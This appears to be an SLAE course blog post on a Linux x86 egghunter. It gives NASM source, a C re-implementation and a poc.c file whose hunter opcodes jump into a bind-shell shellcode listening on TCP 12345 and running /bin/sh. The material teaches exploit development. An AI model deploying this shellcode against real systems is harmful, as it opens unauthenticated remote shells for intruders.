This assignment is about writing a working demo of an egghunter. An egghunter is a small piece of code that searches memory for a marker value (the egg). When it finds the egg, it jumps to the address directly behind the egg and executes whatever is stored there, so the hunter itself can stay tiny while the real payload sits anywhere in the process's memory. For the full explanation read skape's paper "Safely Searching Process Virtual Address Space":
egghunt-shellcode.pdf
I used the second example (access revisited) for building my egghunter.
First, the egghunter code:
egghunter.nasm

    global _start
    section .text

    _start:
        xor edx, edx            ; start the search at address 0

    doloop:
        or dx, 0xfff            ; move to the last byte of the current page ...
    nextaddr:
        inc edx                 ; ... and on to the next address (or the next page)
        lea ebx, [edx+0x4]      ; probe edx+4: if that byte is readable, the dword at edx is too
        push byte +0x21         ; sys_access = 33
        pop eax
        int 0x80                ; access(ebx, ecx); ecx (the mode argument) is never set
        cmp al, 0xf2            ; -EFAULT (-14): the page is not mapped
        jz doloop               ; unmapped, skip the whole page
        mov eax, 0x50905090     ; the egg
        mov edi, edx
        scasd                   ; first egg at edx?
        jnz nextaddr
        scasd                   ; second egg at edx+4?
        jnz nextaddr
        jmp edi                 ; edi now points right behind the doubled egg

Two details are worth knowing before reusing this. The egg has to appear twice in a row (eight bytes) because the hunter contains the four-byte value once itself, in `mov eax, 0x50905090`, and would otherwise find its own code. And the mode argument of access() in ecx is never initialised: the kernel returns -EINVAL instead of -EFAULT when mode contains bits outside 0x7, and with such a value in ecx the hunter would treat unmapped pages as readable and crash on the first one. A `xor ecx, ecx` before the loop (two more bytes) removes that dependency; the demo below works as posted.
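The same search loop written out in C, as an added example that is not part of the original post or of skape's paper: it probes each candidate address with access(2), skips unreadable pages exactly the way `or dx,0xfff ; inc edx` does, and looks for the doubled egg. Instead of jumping to the hit it returns the address behind the egg. The memory it scans is constructed for the demo: three anonymous pages with the middle one unmapped, and the egg planted in the third. The names `probe_readable`, `dword_is_egg`, `egghunt` and `run_demo` are mine.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#define PAGE 4096u

/* The egg 0x50905090 as it lies in memory (little-endian); it appears twice in the payload. */
static const uint8_t EGG[4] = { 0x90, 0x50, 0x90, 0x50 };

/* Mirrors `lea ebx,[edx+4] ; push 0x21 ; pop eax ; int 0x80 ; cmp al,0xf2`:
 * access(2) fails with EFAULT for an unmapped pointer and with something else
 * (ENOENT, ENAMETOOLONG, ...) or succeeds for a mapped one. F_OK is passed
 * explicitly so a stale mode value can never turn the answer into EINVAL. */
static int probe_readable(uintptr_t p)
{
    if (access((const char *)p, F_OK) == 0)
        return 1;
    return errno != EFAULT;
}

/* scasd equivalent: compare one dword with the egg byte by byte, stopping at
 * the first mismatch so nothing beyond a mismatching byte is ever touched. */
static int dword_is_egg(const uint8_t *p)
{
    for (int i = 0; i < 4; i++)
        if (p[i] != EGG[i])
            return 0;
    return 1;
}

/* Scan [start, end) for EGG EGG and return the address right behind it, or
 * NULL. Unreadable pages are skipped with the `or dx,0xfff ; inc edx` trick. */
const uint8_t *egghunt(uintptr_t start, uintptr_t end)
{
    uintptr_t addr = start;
    while (addr < end) {
        if (!probe_readable(addr + 4)) {
            addr = (addr | (PAGE - 1)) + 1;   /* first byte of the next page */
            continue;
        }
        const uint8_t *p = (const uint8_t *)addr;
        if (dword_is_egg(p) && dword_is_egg(p + 4))
            return p + 8;                     /* jmp edi */
        addr++;                               /* inc edx */
    }
    return NULL;
}

/* Constructed scene (not a real process image): three anonymous pages, the
 * middle one unmapped so the hunter has to skip an unreadable page. With
 * plant != 0 the doubled egg plus a marker string is written into the third
 * page. Returns the hit's offset from where the egg was planted (8 when the
 * hunter lands right behind the egg), -1 when nothing was found, -2 on
 * mmap/munmap failure. */
int run_demo(int plant)
{
    uint8_t *base = mmap(NULL, 3 * PAGE, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED)
        return -2;
    if (munmap(base + PAGE, PAGE) != 0)
        return -2;

    uint8_t *egg_at = base + 2 * PAGE + 0x123;      /* arbitrary spot in page 3 */
    if (plant) {
        memcpy(egg_at, EGG, 4);
        memcpy(egg_at + 4, EGG, 4);
        memcpy(egg_at + 8, "payload", 8);           /* stands in for the shellcode */
    }

    const uint8_t *hit = egghunt((uintptr_t)base, (uintptr_t)base + 3 * PAGE);
    int result = hit ? (int)(hit - egg_at) : -1;

    munmap(base, PAGE);
    munmap(base + 2 * PAGE, PAGE);
    return result;
}

int main(void)
{
    int off = run_demo(1);
    if (off == 8)
        printf("egg found, payload starts 8 bytes behind the egg position\n");
    else
        printf("egg not found (result %d)\n", off);
    printf("control run without egg: %d (expect -1)\n", run_demo(0));
    return off == 8 ? 0 : 1;
}
```

The first run probes 4096 addresses in page one, hits EFAULT as soon as edx+4 crosses into the unmapped second page, skips it in one step and finds the egg in the third page; the control run over the same layout without an egg returns -1.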
And the demo code:
poc.c

    #include <stdio.h>
    #include <string.h>

    // egghunter from egghunter.nasm (35 bytes, no NUL bytes)
    unsigned char egghunter[] =
    "\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\xcd\x80"
    "\x3c\xf2\x74\xee\xb8\x90\x50\x90\x50\x89\xd7\xaf\x75\xe9\xaf\x75"
    "\xe6\xff\xe7";

    // add some data between hunter and shellcode so the hunter really has to search
    char stuff[] = "Eat my shorts";

    // bind shellcode from assignment 1 (listens on TCP port 12345), prefixed with the doubled egg
    unsigned char shellcode[] =
    "\x90\x50\x90\x50"   // egg
    "\x90\x50\x90\x50"   // egg
    "\x6a\x66\x58\x31\xdb\x43\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6"          // socket()
    "\x6a\x66\x58\x43\x52\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80"  // bind()
    "\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80"                                              // listen()
    "\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3"                                      // accept()
    "\x6a\x02\x59\xb0\x3f\xcd\x80\x49\xb0\x3f\xcd\x80\x49\xb0\x3f\xcd\x80"                  // dup2() x3
    "\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"; // execve("/bin//sh")

    int main(void)
    {
        printf("Shellcode Length: %zu\n", strlen((char *)shellcode));
        printf("Egghunter Length: %zu\n", strlen((char *)egghunter));

        // run the egghunter; it scans memory for the doubled egg and jumps
        // behind it, i.e. into the bind shellcode
        int (*ret)() = (int(*)())egghunter;
        ret();
        return 0;
    }
When this runs, the hunter finds the egg in front of shellcode[] and the bind shell is up. For the shellcode I used the bind shellcode from assignment 1, but any shellcode can be used here as long as it is prefixed with the doubled egg. The hunter is 32-bit code (int 0x80, 32-bit registers), so the demo has to be built as a 32-bit binary exactly as in assignments 1 and 2; compiling and extracting the shellcode is the same procedure, so I won't repeat it here.
Get the code.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-342